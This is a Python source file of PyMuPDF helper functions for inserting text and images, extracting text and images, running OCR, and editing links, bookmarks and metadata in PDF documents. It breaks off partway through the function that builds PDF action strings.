AnyType = typing.Any
OptInt = typing.Union[int, None]
OptFloat = typing.Optional[float]
OptStr = typing.Optional[str]
OptDict = typing.Optional[dict]
OptBytes = typing.Optional[typing.ByteString]
OptSeq = typing.Optional[typing.Sequence]
"""
This is a collection of functions to extend PyMupdf.
"""
def write_text(page: Page, **kwargs) -> None:
"""Write the text of one or more TextWriter objects.
Args:
rect: target rectangle. If None, the union of the text writers is used.
writers: one or more TextWriter objects.
overlay: put in foreground or background.
keep_proportion: maintain aspect ratio of rectangle sides.
rotate: arbitrary rotation angle.
oc: the xref of an optional content object
"""
if type(page) is not Page:
raise ValueError("bad page parameter")
s = {
k
for k in kwargs.keys()
if k
not in {
"rect",
"writers",
"opacity",
"color",
"overlay",
"keep_proportion",
"rotate",
"oc",
}
}
if s != set():
raise ValueError("bad keywords: " + str(s))
rect = kwargs.get("rect")
writers = kwargs.get("writers")
opacity = kwargs.get("opacity")
color = kwargs.get("color")
overlay = bool(kwargs.get("overlay", True))
keep_proportion = bool(kwargs.get("keep_proportion", True))
rotate = int(kwargs.get("rotate", 0))
oc = int(kwargs.get("oc", 0))
if not writers:
raise ValueError("need at least one TextWriter")
if type(writers) is TextWriter:
if rotate == 0 and rect is None:
writers.write_text(page, opacity=opacity, color=color, overlay=overlay)
return None
else:
writers = (writers,)
clip = writers[0].text_rect
textdoc = Document()
tpage = textdoc.new_page(width=page.rect.width, height=page.rect.height)
for writer in writers:
clip |= writer.text_rect
writer.write_text(tpage, opacity=opacity, color=color)
if rect is None:
rect = clip
page.show_pdf_page(
rect,
textdoc,
0,
overlay=overlay,
keep_proportion=keep_proportion,
rotate=rotate,
clip=clip,
oc=oc,
)
textdoc = None
tpage = None
def show_pdf_page(*args, **kwargs) -> int:
"""Show page number 'pno' of PDF 'src' in rectangle 'rect'.
Args:
rect: (rect-like) where to place the source image
src: (document) source PDF
pno: (int) source page number
overlay: (bool) put in foreground
keep_proportion: (bool) do not change width-height-ratio
rotate: (int) degrees (multiple of 90)
clip: (rect-like) part of source page rectangle
Returns:
xref of inserted object (for reuse)
"""
if len(args) not in (3, 4):
raise ValueError("bad number of positional parameters")
pno = None
if len(args) == 3:
page, rect, src = args
else:
page, rect, src, pno = args
if pno == None:
pno = int(kwargs.get("pno", 0))
overlay = bool(kwargs.get("overlay", True))
keep_proportion = bool(kwargs.get("keep_proportion", True))
rotate = float(kwargs.get("rotate", 0))
oc = int(kwargs.get("oc", 0))
clip = kwargs.get("clip")
def calc_matrix(sr, tr, keep=True, rotate=0):
"""Calculate transformation matrix from source to target rect.
Notes:
The product of four matrices in this sequence: (1) translate correct
source corner to origin, (2) rotate, (3) scale, (4) translate to
target's top-left corner.
Args:
sr: source rect in PDF (!) coordinate system
tr: target rect in PDF coordinate system
keep: whether to keep source ratio of width to height
rotate: rotation angle in degrees
Returns:
Transformation matrix.
"""
# calc center point of source rect
smp = (sr.tl + sr.br) / 2.0
# calc center point of target rect
tmp = (tr.tl + tr.br) / 2.0
# m moves to (0, 0), then rotates
m = Matrix(1, 0, 0, 1, -smp.x, -smp.y) * Matrix(rotate)
sr1 = sr * m # resulting source rect to calculate scale factors
fw = tr.width / sr1.width # scale the width
fh = tr.height / sr1.height # scale the height
if keep:
fw = fh = min(fw, fh) # take min if keeping aspect ratio
m *= Matrix(fw, fh) # concat scale matrix
m *= Matrix(1, 0, 0, 1, tmp.x, tmp.y) # concat move to target center
return JM_TUPLE(m)
CheckParent(page)
doc = page.parent
if not doc.is_pdf or not src.is_pdf:
raise ValueError("is no PDF")
if rect.is_empty or rect.is_infinite:
raise ValueError("rect must be finite and not empty")
while pno < 0: # support negative page numbers
pno += src.page_count
src_page = src[pno] # load source page
if src_page.get_contents() == []:
raise ValueError("nothing to show - source page empty")
tar_rect = rect * ~page.transformation_matrix # target rect in PDF coordinates
src_rect = src_page.rect if not clip else src_page.rect & clip # source rect
if src_rect.is_empty or src_rect.is_infinite:
raise ValueError("clip must be finite and not empty")
src_rect = src_rect * ~src_page.transformation_matrix # ... in PDF coord
matrix = calc_matrix(src_rect, tar_rect, keep=keep_proportion, rotate=rotate)
# list of existing /Form /XObjects
ilst = [i[1] for i in doc.get_page_xobjects(page.number)]
ilst += [i[7] for i in doc.get_page_images(page.number)]
ilst += [i[4] for i in doc.get_page_fonts(page.number)]
# create a name not in that list
n = "fzFrm"
i = 0
_imgname = n + "0"
while _imgname in ilst:
i += 1
_imgname = n + str(i)
isrc = src._graft_id # used as key for graftmaps
if doc._graft_id == isrc:
raise ValueError("source document must not equal target")
# retrieve / make Graftmap for source PDF
gmap = doc.Graftmaps.get(isrc, None)
if gmap is None:
gmap = Graftmap(doc)
doc.Graftmaps[isrc] = gmap
# take note of generated xref for automatic reuse
pno_id = (isrc, pno) # id of src[pno]
xref = doc.ShownPages.get(pno_id, 0)
xref = page._show_pdf_page(
src_page,
overlay=overlay,
matrix=matrix,
xref=xref,
oc=oc,
clip=src_rect,
graftmap=gmap,
_imgname=_imgname,
)
doc.ShownPages[pno_id] = xref
return xref
def replace_image(page: Page, xref: int, *, filename=None, pixmap=None, stream=None):
"""Replace the image referred to by xref.
Replace the image by changing the object definition stored under xref. This
will leave the pages appearance instructions intact, so the new image is
being displayed with the same bbox, rotation etc.
By providing a small fully transparent image, an effect as if the image had
been deleted can be achieved.
A typical use may include replacing large images by a smaller version,
e.g. with a lower resolution or graylevel instead of colored.
Args:
xref: the xref of the image to replace.
filename, pixmap, stream: exactly one of these must be provided. The
meaning being the same as in Page.insert_image.
"""
doc = page.parent # the owning document
if not doc.xref_is_image(xref):
raise ValueError("xref not an image") # insert new image anywhere in page
if bool(filename) + bool(stream) + bool(pixmap) != 1:
raise ValueError("Exactly one of filename/stream/pixmap must be given")
new_xref = page.insert_image(
page.rect, filename=filename, stream=stream, pixmap=pixmap
)
doc.xref_copy(new_xref, xref) # copy over new to old
last_contents_xref = page.get_contents()[-1]
# new image insertion has created a new /Contents source,
# which we will set to spaces now
doc.update_stream(last_contents_xref, b" ")
def delete_image(page: Page, xref: int):
"""Delete the image referred to by xef.
Actually replaces by a small transparent Pixmap using method Page.replace_image.
Args:
xref: xref of the image to delete.
"""
# make a small 100% transparent pixmap (of just any dimension)
pix = fitz_old.Pixmap(fitz_old.csGRAY, (0, 0, 1, 1), 1)
pix.clear_with() # clear all samples bytes to 0x00
page.replace_image(xref, pixmap=pix)
def insert_image(page, rect, **kwargs):
"""Insert an image for display in a rectangle.
Args:
rect: (rect_like) position of image on the page.
alpha: (int, optional) set to 0 if image has no transparency.
filename: (str, Path, file object) image filename.
keep_proportion: (bool) keep width / height ratio (default).
mask: (bytes, optional) image consisting of alpha values to use.
oc: (int) xref of OCG or OCMD to declare as Optional Content.
overlay: (bool) put in foreground (default) or background.
pixmap: (Pixmap) use this as image.
rotate: (int) rotate by 0, 90, 180 or 270 degrees.
stream: (bytes) use this as image.
xref: (int) use this as image.
'page' and 'rect' are positional, all other parameters are keywords.
If 'xref' is given, that image is used. Other input options are ignored.
Else, exactly one of pixmap, stream or filename must be given.
'alpha=0' for non-transparent images improves performance significantly.
Affects stream and filename only.
Optimum transparent insertions are possible by using filename / stream in
conjunction with a 'mask' image of alpha values.
Returns:
xref (int) of inserted image. Re-use as argument for multiple insertions.
"""
CheckParent(page)
doc = page.parent
if not doc.is_pdf:
raise ValueError("is no PDF")
valid_keys = {
"alpha",
"filename",
"height",
"keep_proportion",
"mask",
"oc",
"overlay",
"pixmap",
"rotate",
"stream",
"width",
"xref",
}
s = set(kwargs.keys()).difference(valid_keys)
if s != set():
raise ValueError(f"bad key argument(s): {s}.")
filename = kwargs.get("filename")
pixmap = kwargs.get("pixmap")
stream = kwargs.get("stream")
mask = kwargs.get("mask")
rotate = int(kwargs.get("rotate", 0))
width = int(kwargs.get("width", 0))
height = int(kwargs.get("height", 0))
alpha = int(kwargs.get("alpha", -1))
oc = int(kwargs.get("oc", 0))
xref = int(kwargs.get("xref", 0))
keep_proportion = bool(kwargs.get("keep_proportion", True))
overlay = bool(kwargs.get("overlay", True))
if xref == 0 and (bool(filename) + bool(stream) + bool(pixmap) != 1):
raise ValueError("xref=0 needs exactly one of filename, pixmap, stream")
if filename:
if type(filename) is str:
pass
elif hasattr(filename, "absolute"):
filename = str(filename)
elif hasattr(filename, "name"):
filename = filename.name
else:
raise ValueError("bad filename")
if filename and not os.path.exists(filename):
raise FileNotFoundError("No such file: '%s'" % filename)
elif stream and type(stream) not in (bytes, bytearray, io.BytesIO):
raise ValueError("stream must be bytes-like / BytesIO")
elif pixmap and type(pixmap) is not Pixmap:
raise ValueError("pixmap must be a Pixmap")
if mask and not (stream or filename):
raise ValueError("mask requires stream or filename")
if mask and type(mask) not in (bytes, bytearray, io.BytesIO):
raise ValueError("mask must be bytes-like / BytesIO")
while rotate < 0:
rotate += 360
while rotate >= 360:
rotate -= 360
if rotate not in (0, 90, 180, 270):
raise ValueError("bad rotate value")
r = Rect(rect)
if r.is_empty or r.is_infinite:
raise ValueError("rect must be finite and not empty")
clip = r * ~page.transformation_matrix
# Create a unique image reference name.
ilst = [i[7] for i in doc.get_page_images(page.number)]
ilst += [i[1] for i in doc.get_page_xobjects(page.number)]
ilst += [i[4] for i in doc.get_page_fonts(page.number)]
n = "fzImg" # 'fitz image'
i = 0
_imgname = n + "0" # first name candidate
while _imgname in ilst:
i += 1
_imgname = n + str(i) # try new name
digests = doc.InsertedImages
xref, digests = page._insert_image(
filename=filename,
pixmap=pixmap,
stream=stream,
imask=mask,
clip=clip,
overlay=overlay,
oc=oc,
xref=xref,
rotate=rotate,
keep_proportion=keep_proportion,
width=width,
height=height,
alpha=alpha,
_imgname=_imgname,
digests=digests,
)
if digests != None:
doc.InsertedImages = digests
return xref
def search_for(*args, **kwargs) -> list:
"""Search for a string on a page.
Args:
text: string to be searched for
clip: restrict search to this rectangle
quads: (bool) return quads instead of rectangles
flags: bit switches, default: join hyphened words
textpage: a pre-created TextPage
Returns:
a list of rectangles or quads, each containing one occurrence.
"""
if len(args) != 2:
raise ValueError("bad number of positional parameters")
page, text = args
quads = kwargs.get("quads", 0)
clip = kwargs.get("clip")
textpage = kwargs.get("textpage")
if clip != None:
clip = Rect(clip)
flags = kwargs.get(
"flags",
TEXT_DEHYPHENATE
| TEXT_PRESERVE_WHITESPACE
| TEXT_PRESERVE_LIGATURES
| TEXT_MEDIABOX_CLIP,
)
CheckParent(page)
tp = textpage
if tp is None:
tp = page.get_textpage(clip=clip, flags=flags) # create TextPage
elif getattr(tp, "parent") != page:
raise ValueError("not a textpage of this page")
rlist = tp.search(text, quads=quads)
if textpage is None:
del tp
return rlist
def search_page_for(
doc: Document,
pno: int,
text: str,
quads: bool = False,
clip: rect_like = None,
flags: int = TEXT_DEHYPHENATE
| TEXT_PRESERVE_LIGATURES
| TEXT_PRESERVE_WHITESPACE
| TEXT_MEDIABOX_CLIP,
textpage: TextPage = None,
) -> list:
"""Search for a string on a page.
Args:
pno: page number
text: string to be searched for
clip: restrict search to this rectangle
quads: (bool) return quads instead of rectangles
flags: bit switches, default: join hyphened words
textpage: reuse a prepared textpage
Returns:
a list of rectangles or quads, each containing an occurrence.
"""
return doc[pno].search_for(
text,
quads=quads,
clip=clip,
flags=flags,
textpage=textpage,
)
def get_text_blocks(
page: Page,
clip: rect_like = None,
flags: OptInt = None,
textpage: TextPage = None,
sort: bool = False,
) -> list:
"""Return the text blocks on a page.
Notes:
Lines in a block are concatenated with line breaks.
Args:
flags: (int) control the amount of data parsed into the textpage.
Returns:
A list of the blocks. Each item contains the containing rectangle
coordinates, text lines, block type and running block number.
"""
CheckParent(page)
if flags is None:
flags = (
TEXT_PRESERVE_WHITESPACE
| TEXT_PRESERVE_IMAGES
| TEXT_PRESERVE_LIGATURES
| TEXT_MEDIABOX_CLIP
)
tp = textpage
if tp is None:
tp = page.get_textpage(clip=clip, flags=flags)
elif getattr(tp, "parent") != page:
raise ValueError("not a textpage of this page")
blocks = tp.extractBLOCKS()
if textpage is None:
del tp
if sort is True:
blocks.sort(key=lambda b: (b[3], b[0]))
return blocks
def get_text_words(
page: Page,
clip: rect_like = None,
flags: OptInt = None,
textpage: TextPage = None,
sort: bool = False,
delimiters=None,
) -> list:
"""Return the text words as a list with the bbox for each word.
Args:
flags: (int) control the amount of data parsed into the textpage.
delimiters: (str,list) characters to use as word delimiters
Returns:
Word tuples (x0, y0, x1, y1, "word", bno, lno, wno).
"""
CheckParent(page)
if flags is None:
flags = TEXT_PRESERVE_WHITESPACE | TEXT_PRESERVE_LIGATURES | TEXT_MEDIABOX_CLIP
tp = textpage
if tp is None:
tp = page.get_textpage(clip=clip, flags=flags)
elif getattr(tp, "parent") != page:
raise ValueError("not a textpage of this page")
words = tp.extractWORDS(delimiters)
if textpage is None:
del tp
if sort is True:
words.sort(key=lambda w: (w[3], w[0]))
return words
def get_textbox(
page: Page,
rect: rect_like,
textpage: TextPage = None,
) -> str:
tp = textpage
if tp is None:
tp = page.get_textpage()
elif getattr(tp, "parent") != page:
raise ValueError("not a textpage of this page")
rc = tp.extractTextbox(rect)
if textpage is None:
del tp
return rc
def get_text_selection(
page: Page,
p1: point_like,
p2: point_like,
clip: rect_like = None,
textpage: TextPage = None,
):
CheckParent(page)
tp = textpage
if tp is None:
tp = page.get_textpage(clip=clip, flags=TEXT_DEHYPHENATE)
elif getattr(tp, "parent") != page:
raise ValueError("not a textpage of this page")
rc = tp.extractSelection(p1, p2)
if textpage is None:
del tp
return rc
def get_textpage_ocr(
page: Page,
flags: int = 0,
language: str = "eng",
dpi: int = 72,
full: bool = False,
tessdata: str = None,
) -> TextPage:
"""Create a Textpage from combined results of normal and OCR text parsing.
Args:
flags: (int) control content becoming part of the result.
language: (str) specify expected language(s). Deafault is "eng" (English).
dpi: (int) resolution in dpi, default 72.
full: (bool) whether to OCR the full page image, or only its images (default)
"""
CheckParent(page)
if not os.getenv("TESSDATA_PREFIX") and not tessdata:
raise RuntimeError("No OCR support: TESSDATA_PREFIX not set")
def full_ocr(page, dpi, language, flags):
zoom = dpi / 72
mat = Matrix(zoom, zoom)
pix = page.get_pixmap(matrix=mat)
ocr_pdf = Document(
"pdf",
pix.pdfocr_tobytes(compress=False, language=language, tessdata=tessdata),
)
ocr_page = ocr_pdf.load_page(0)
unzoom = page.rect.width / ocr_page.rect.width
ctm = Matrix(unzoom, unzoom) * page.derotation_matrix
tpage = ocr_page.get_textpage(flags=flags, matrix=ctm)
ocr_pdf.close()
pix = None
tpage.parent = weakref.proxy(page)
return tpage
# if OCR for the full page, OCR its pixmap @ desired dpi
if full is True:
return full_ocr(page, dpi, language, flags)
# For partial OCR, make a normal textpage, then extend it with text that
# is OCRed from each image.
# Because of this, we need the images flag bit set ON.
tpage = page.get_textpage(flags=flags)
for block in page.get_text("dict", flags=TEXT_PRESERVE_IMAGES)["blocks"]:
if block["type"] != 1: # only look at images
continue
bbox = Rect(block["bbox"])
if bbox.width <= 3 or bbox.height <= 3: # ignore tiny stuff
continue
try:
pix = Pixmap(block["image"]) # get image pixmap
if pix.n - pix.alpha != 3: # we need to convert this to RGB!
pix = Pixmap(csRGB, pix)
if pix.alpha: # must remove alpha channel
pix = Pixmap(pix, 0)
imgdoc = Document(
"pdf", pix.pdfocr_tobytes(language=language, tessdata=tessdata)
) # pdf with OCRed page
imgpage = imgdoc.load_page(0) # read image as a page
pix = None
# compute matrix to transform coordinates back to that of 'page'
imgrect = imgpage.rect # page size of image PDF
shrink = Matrix(1 / imgrect.width, 1 / imgrect.height)
mat = shrink * block["transform"]
imgpage.extend_textpage(tpage, flags=0, matrix=mat)
imgdoc.close()
except RuntimeError:
tpage = None
print("Falling back to full page OCR")
return full_ocr(page, dpi, language, flags)
return tpage
def get_image_info(page: Page, hashes: bool = False, xrefs: bool = False) -> list:
"""Extract image information only from a TextPage.
Args:
hashes: (bool) include MD5 hash for each image.
xrefs: (bool) try to find the xref for each image. Sets hashes to true.
"""
doc = page.parent
if xrefs and doc.is_pdf:
hashes = True
if not doc.is_pdf:
xrefs = False
imginfo = getattr(page, "_image_info", None)
if imginfo and not xrefs:
return imginfo
if not imginfo:
tp = page.get_textpage(flags=TEXT_PRESERVE_IMAGES)
imginfo = tp.extractIMGINFO(hashes=hashes)
del tp
if hashes:
page._image_info = imginfo
if not xrefs or not doc.is_pdf:
return imginfo
imglist = page.get_images()
digests = {}
for item in imglist:
xref = item[0]
pix = Pixmap(doc, xref)
digests[pix.digest] = xref
del pix
for i in range(len(imginfo)):
item = imginfo[i]
xref = digests.get(item["digest"], 0)
item["xref"] = xref
imginfo[i] = item
return imginfo
def get_image_rects(page: Page, name, transform=False) -> list:
"""Return list of image positions on a page.
Args:
name: (str, list, int) image identification. May be reference name, an
item of the page's image list or an xref.
transform: (bool) whether to also return the transformation matrix.
Returns:
A list of Rect objects or tuples of (Rect, Matrix) for all image
locations on the page.
"""
if type(name) in (list, tuple):
xref = name[0]
elif type(name) is int:
xref = name
else:
imglist = [i for i in page.get_images() if i[7] == name]
if imglist == []:
raise ValueError("bad image name")
elif len(imglist) != 1:
raise ValueError("multiple image names found")
xref = imglist[0][0]
pix = Pixmap(page.parent, xref) # make pixmap of the image to compute MD5
digest = pix.digest
del pix
infos = page.get_image_info(hashes=True)
if not transform:
bboxes = [Rect(im["bbox"]) for im in infos if im["digest"] == digest]
else:
bboxes = [
(Rect(im["bbox"]), Matrix(im["transform"]))
for im in infos
if im["digest"] == digest
]
return bboxes
def get_text(
page: Page,
option: str = "text",
clip: rect_like = None,
flags: OptInt = None,
textpage: TextPage = None,
sort: bool = False,
delimiters=None,
):
"""Extract text from a page or an annotation.
This is a unifying wrapper for various methods of the TextPage class.
Args:
option: (str) text, words, blocks, html, dict, json, rawdict, xhtml or xml.
clip: (rect-like) restrict output to this area.
flags: bit switches to e.g. exclude images or decompose ligatures.
textpage: reuse this TextPage and make no new one. If specified,
'flags' and 'clip' are ignored.
Returns:
the output of methods get_text_words / get_text_blocks or TextPage
methods extractText, extractHTML, extractDICT, extractJSON, extractRAWDICT,
extractXHTML or etractXML respectively.
Default and misspelling choice is "text".
"""
formats = {
"text": fitz.TEXTFLAGS_TEXT,
"html": fitz.TEXTFLAGS_HTML,
"json": fitz.TEXTFLAGS_DICT,
"rawjson": fitz.TEXTFLAGS_RAWDICT,
"xml": fitz.TEXTFLAGS_XML,
"xhtml": fitz.TEXTFLAGS_XHTML,
"dict": fitz.TEXTFLAGS_DICT,
"rawdict": fitz.TEXTFLAGS_RAWDICT,
"words": fitz.TEXTFLAGS_WORDS,
"blocks": fitz.TEXTFLAGS_BLOCKS,
}
option = option.lower()
if option not in formats:
option = "text"
if flags is None:
flags = formats[option]
if option == "words":
return get_text_words(
page,
clip=clip,
flags=flags,
textpage=textpage,
sort=sort,
delimiters=delimiters,
)
if option == "blocks":
return get_text_blocks(
page, clip=clip, flags=flags, textpage=textpage, sort=sort
)
CheckParent(page)
cb = None
if option in ("html", "xml", "xhtml"): # no clipping for MuPDF functions
clip = page.cropbox
if clip != None:
clip = Rect(clip)
cb = None
elif type(page) is Page:
cb = page.cropbox
# TextPage with or without images
tp = textpage
if tp is None:
tp = page.get_textpage(clip=clip, flags=flags)
elif getattr(tp, "parent") != page:
raise ValueError("not a textpage of this page")
if option == "json":
t = tp.extractJSON(cb=cb, sort=sort)
elif option == "rawjson":
t = tp.extractRAWJSON(cb=cb, sort=sort)
elif option == "dict":
t = tp.extractDICT(cb=cb, sort=sort)
elif option == "rawdict":
t = tp.extractRAWDICT(cb=cb, sort=sort)
elif option == "html":
t = tp.extractHTML()
elif option == "xml":
t = tp.extractXML()
elif option == "xhtml":
t = tp.extractXHTML()
else:
t = tp.extractText(sort=sort)
if textpage is None:
del tp
return t
def get_page_text(
doc: Document,
pno: int,
option: str = "text",
clip: rect_like = None,
flags: OptInt = None,
textpage: TextPage = None,
sort: bool = False,
) -> typing.Any:
"""Extract a document page's text by page number.
Notes:
Convenience function calling page.get_text().
Args:
pno: page number
option: (str) text, words, blocks, html, dict, json, rawdict, xhtml or xml.
Returns:
output from page.TextPage().
"""
return doc[pno].get_text(option, clip=clip, flags=flags, sort=sort)
def get_pixmap(
page: Page,
*,
matrix: matrix_like = Identity,
dpi=None,
colorspace: Colorspace = csRGB,
clip: rect_like = None,
alpha: bool = False,
annots: bool = True,
) -> Pixmap:
"""Create pixmap of page.
Keyword args:
matrix: Matrix for transformation (default: Identity).
dpi: desired dots per inch. If given, matrix is ignored.
colorspace: (str/Colorspace) cmyk, rgb, gray - case ignored, default csRGB.
clip: (irect-like) restrict rendering to this area.
alpha: (bool) whether to include alpha channel
annots: (bool) whether to also render annotations
"""
CheckParent(page)
if dpi:
zoom = dpi / 72
matrix = Matrix(zoom, zoom)
if type(colorspace) is str:
if colorspace.upper() == "GRAY":
colorspace = csGRAY
elif colorspace.upper() == "CMYK":
colorspace = csCMYK
else:
colorspace = csRGB
if colorspace.n not in (1, 3, 4):
raise ValueError("unsupported colorspace")
dl = page.get_displaylist(annots=annots)
pix = dl.get_pixmap(matrix=matrix, colorspace=colorspace, alpha=alpha, clip=clip)
dl = None
if dpi:
pix.set_dpi(dpi, dpi)
return pix
def get_page_pixmap(
doc: Document,
pno: int,
*,
matrix: matrix_like = Identity,
dpi=None,
colorspace: Colorspace = csRGB,
clip: rect_like = None,
alpha: bool = False,
annots: bool = True,
) -> Pixmap:
"""Create pixmap of document page by page number.
Notes:
Convenience function calling page.get_pixmap.
Args:
pno: (int) page number
matrix: Matrix for transformation (default: Identity).
colorspace: (str,Colorspace) rgb, rgb, gray - case ignored, default csRGB.
clip: (irect-like) restrict rendering to this area.
alpha: (bool) include alpha channel
annots: (bool) also render annotations
"""
return doc[pno].get_pixmap(
matrix=matrix,
dpi=dpi,
colorspace=colorspace,
clip=clip,
alpha=alpha,
annots=annots,
)
def getLinkDict(ln) -> dict:
nl = {"kind": ln.dest.kind, "xref": 0}
try:
nl["from"] = ln.rect
except:
pass
pnt = Point(0, 0)
if ln.dest.flags & LINK_FLAG_L_VALID:
pnt.x = ln.dest.lt.x
if ln.dest.flags & LINK_FLAG_T_VALID:
pnt.y = ln.dest.lt.y
if ln.dest.kind == LINK_URI:
nl["uri"] = ln.dest.uri
elif ln.dest.kind == LINK_GOTO:
nl["page"] = ln.dest.page
nl["to"] = pnt
if ln.dest.flags & LINK_FLAG_R_IS_ZOOM:
nl["zoom"] = ln.dest.rb.x
else:
nl["zoom"] = 0.0
elif ln.dest.kind == LINK_GOTOR:
nl["file"] = ln.dest.fileSpec.replace("\\", "/")
nl["page"] = ln.dest.page
if ln.dest.page < 0:
nl["to"] = ln.dest.dest
else:
nl["to"] = pnt
if ln.dest.flags & LINK_FLAG_R_IS_ZOOM:
nl["zoom"] = ln.dest.rb.x
else:
nl["zoom"] = 0.0
elif ln.dest.kind == LINK_LAUNCH:
nl["file"] = ln.dest.fileSpec.replace("\\", "/")
elif ln.dest.kind == LINK_NAMED:
nl["name"] = ln.dest.named
else:
nl["page"] = ln.dest.page
return nl
def get_links(page: Page) -> list:
"""Create a list of all links contained in a PDF page.
Notes:
see PyMuPDF ducmentation for details.
"""
CheckParent(page)
ln = page.first_link
links = []
while ln:
nl = getLinkDict(ln)
links.append(nl)
ln = ln.next
if links != [] and page.parent.is_pdf:
linkxrefs = [x for x in page.annot_xrefs() if x[1] == PDF_ANNOT_LINK]
if len(linkxrefs) == len(links):
for i in range(len(linkxrefs)):
links[i]["xref"] = linkxrefs[i][0]
links[i]["id"] = linkxrefs[i][2]
return links
def get_toc(
doc: Document,
simple: bool = True,
) -> list:
"""Create a table of contents.
Args:
simple: a bool to control output. Returns a list, where each entry consists of outline level, title, page number and link destination (if simple = False). For details see PyMuPDF's documentation.
"""
def recurse(olItem, liste, lvl):
"""Recursively follow the outline item chain and record item information in a list."""
while olItem:
if olItem.title:
title = olItem.title
else:
title = " "
if not olItem.is_external:
if olItem.uri:
if olItem.page == -1:
resolve = doc.resolve_link(olItem.uri)
page = resolve[0] + 1
else:
page = olItem.page + 1
else:
page = -1
else:
page = -1
if not simple:
link = getLinkDict(olItem)
liste.append([lvl, title, page, link])
else:
liste.append([lvl, title, page])
if olItem.down:
liste = recurse(olItem.down, liste, lvl + 1)
olItem = olItem.next
return liste
# ensure document is open
if doc.is_closed:
raise ValueError("document closed")
doc.init_doc()
olItem = doc.outline
if not olItem:
return []
lvl = 1
liste = []
toc = recurse(olItem, liste, lvl)
if doc.is_pdf and simple is False:
doc._extend_toc_items(toc)
return toc
def del_toc_item(
doc: Document,
idx: int,
) -> None:
"""Delete TOC / bookmark item by index."""
xref = doc.get_outline_xrefs()[idx]
doc._remove_toc_item(xref)
def set_toc_item(
doc: Document,
idx: int,
dest_dict: OptDict = None,
kind: OptInt = None,
pno: OptInt = None,
uri: OptStr = None,
title: OptStr = None,
to: point_like = None,
filename: OptStr = None,
zoom: float = 0,
) -> None:
"""Update TOC item by index.
It allows changing the item's title and link destination.
Args:
idx: (int) desired index of the TOC list, as created by get_toc.
dest_dict: (dict) destination dictionary as created by get_toc(False).
Outrules all other parameters. If None, the remaining parameters
are used to make a dest dictionary.
kind: (int) kind of link (LINK_GOTO, etc.). If None, then only the
title will be updated. If LINK_NONE, the TOC item will be deleted.
pno: (int) page number (1-based like in get_toc). Required if LINK_GOTO.
uri: (str) the URL, required if LINK_URI.
title: (str) the new title. No change if None.
to: (point-like) destination on the target page. If omitted, (72, 36)
will be used as taget coordinates.
filename: (str) destination filename, required for LINK_GOTOR and
LINK_LAUNCH.
name: (str) a destination name for LINK_NAMED.
zoom: (float) a zoom factor for the target location (LINK_GOTO).
"""
xref = doc.get_outline_xrefs()[idx]
page_xref = 0
if type(dest_dict) is dict:
if dest_dict["kind"] == LINK_GOTO:
pno = dest_dict["page"]
page_xref = doc.page_xref(pno)
page_height = doc.page_cropbox(pno).height
to = dest_dict.get("to", Point(72, 36))
to.y = page_height - to.y
dest_dict["to"] = to
action = getDestStr(page_xref, dest_dict)
if not action.startswith("/A"):
raise ValueError("bad bookmark dest")
color = dest_dict.get("color")
if color:
color = list(map(float, color))
if len(color) != 3 or min(color) < 0 or max(color) > 1:
raise ValueError("bad color value")
bold = dest_dict.get("bold", False)
italic = dest_dict.get("italic", False)
flags = italic + 2 * bold
collapse = dest_dict.get("collapse")
return doc._update_toc_item(
xref,
action=action[2:],
title=title,
color=color,
flags=flags,
collapse=collapse,
)
if kind == LINK_NONE: # delete bookmark item
return doc.del_toc_item(idx)
if kind is None and title is None: # treat as no-op
return None
if kind is None: # only update title text
return doc._update_toc_item(xref, action=None, title=title)
if kind == LINK_GOTO:
if pno is None or pno not in range(1, doc.page_count + 1):
raise ValueError("bad page number")
page_xref = doc.page_xref(pno - 1)
page_height = doc.page_cropbox(pno - 1).height
if to is None:
to = Point(72, page_height - 36)
else:
to = Point(to)
to.y = page_height - to.y
ddict = {
"kind": kind,
"to": to,
"uri": uri,
"page": pno,
"file": filename,
"zoom": zoom,
}
action = getDestStr(page_xref, ddict)
if action == "" or not action.startswith("/A"):
raise ValueError("bad bookmark dest")
return doc._update_toc_item(xref, action=action[2:], title=title)
def get_area(*args) -> float:
"""Calculate area of rectangle.\nparameter is one of 'px' (default), 'in', 'cm', or 'mm'."""
rect = args[0]
if len(args) > 1:
unit = args[1]
else:
unit = "px"
u = {"px": (1, 1), "in": (1.0, 72.0), "cm": (2.54, 72.0), "mm": (25.4, 72.0)}
f = (u[unit][0] / u[unit][1]) ** 2
return f * rect.width * rect.height
def set_metadata(doc: Document, m: dict) -> None:
"""Update the PDF /Info object.
Args:
m: a dictionary like doc.metadata.
"""
if not doc.is_pdf:
raise ValueError("is no PDF")
if doc.is_closed or doc.is_encrypted:
raise ValueError("document closed or encrypted")
if type(m) is not dict:
raise ValueError("bad metadata")
keymap = {
"author": "Author",
"producer": "Producer",
"creator": "Creator",
"title": "Title",
"format": None,
"encryption": None,
"creationDate": "CreationDate",
"modDate": "ModDate",
"subject": "Subject",
"keywords": "Keywords",
"trapped": "Trapped",
}
valid_keys = set(keymap.keys())
diff_set = set(m.keys()).difference(valid_keys)
if diff_set != set():
msg = "bad dict key(s): %s" % diff_set
raise ValueError(msg)
t, temp = doc.xref_get_key(-1, "Info")
if t != "xref":
info_xref = 0
else:
info_xref = int(temp.replace("0 R", ""))
if m == {} and info_xref == 0: # nothing to do
return
if info_xref == 0: # no prev metadata: get new xref
info_xref = doc.get_new_xref()
doc.update_object(info_xref, "<<>>") # fill it with empty object
doc.xref_set_key(-1, "Info", "%i 0 R" % info_xref)
elif m == {}: # remove existing metadata
doc.xref_set_key(-1, "Info", "null")
return
for key, val in [(k, v) for k, v in m.items() if keymap[k] != None]:
pdf_key = keymap[key]
if not bool(val) or val in ("none", "null"):
val = "null"
else:
val = get_pdf_str(val)
doc.xref_set_key(info_xref, pdf_key, val)
doc.init_doc()
return
def getDestStr(xref: int, ddict: dict) -> str:
"""Calculate the PDF action string.
Notes:
Supports Link annotations and outline items (bookmarks).
"""
if not ddict:
return ""
str_goto = "/A<</S/GoTo/D[%i 0 R/XYZ %g %g %g]>>"
str_gotor1 = "/A<</S/GoToR/D[%s /XYZ %g %g %g]/F<</F%s/UF%s/Type/Filespec>>>>"
str_gotor2 = "/A<</S/GoToR/D%s/F<</F%s/UF%s/Type/Filespec>>>>"
str_launch = "/A<</S/Launch/F<</F%s/UF%s/Type/Filespec>>>>"
str_uri = "/A<</S/URI/URI%s>>"
if type(ddict) in (int, float):
dest = str_goto % (xref, 0, ddict, 0)
return dest
d_kind = ddict.get("kind", LINK_NONE)
if d_kind == LINK_NONE:
return ""
if ddict["kind"] == LINK_GOTO:
d_zoom = ddict.get("zoom", 0)
to = ddict.get("to", Point(0, 0))
